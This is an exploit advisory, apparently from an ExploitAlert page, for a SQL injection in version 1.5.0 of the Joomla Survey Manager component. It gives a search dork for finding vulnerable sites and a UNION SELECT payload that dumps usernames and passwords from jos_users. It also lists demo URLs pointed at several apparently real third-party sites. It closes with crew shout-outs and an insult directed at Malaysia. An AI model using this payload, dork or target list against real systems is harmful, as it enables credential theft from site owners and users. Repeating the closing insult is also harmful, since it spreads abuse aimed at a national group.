|    |    |    | Today: 18-Nov-2019 |

Joomla com_surveymanager (stype) SQL Injection Vulnerability

September 23, 2009 | Posted in ExploitAlert


#############################################################################################################
## Joomla com_surveymanager SQL injection vulnerability - (stype) ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 19, 2009 ##
#############################################################################################################
#############################################################################################################
# /~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__ #
# /~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_ #
# /~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__ #
# /~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___ #
# /~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____ #
#____________________________________________________________ -=- KILL-9 CREW -=- INDONESIANCODER -=- #
# #
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.focusdev.co.uk/
[+] Download : http://www.focusdev.co.uk/products/8-joomla-products/17-survey-manager
[+] version : 1.5.0
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_surveymanager"

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_surveymanager&task=editsurvey&stype=[SQL]

[ Exploit ]

-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--

[ Demo ]

http://portal.psz.utm.my/div/btk/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--

http://www.acs-stny.com/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--

http://ridsrealty.com/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik and YOU!!

[ NOTE ]

[+] Selamat Hari Raya Idul Fitri 1930 H
[+] Minal aidzin Wal faidzin, Mohon Maaf Lahir Batin Maap Kalo ada salah2 kata mohon dimaafkan
[+] terima kasih banget buat tukulesto dan arianom yang setiap malam menemani saya waktu exploit .. wkwkwkw

[ QUOTE ]

[+] Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA"
[+] FUCK MALAYSIA !!!

Taged in: injection, Joomla, stype, surveymanager, vulnerability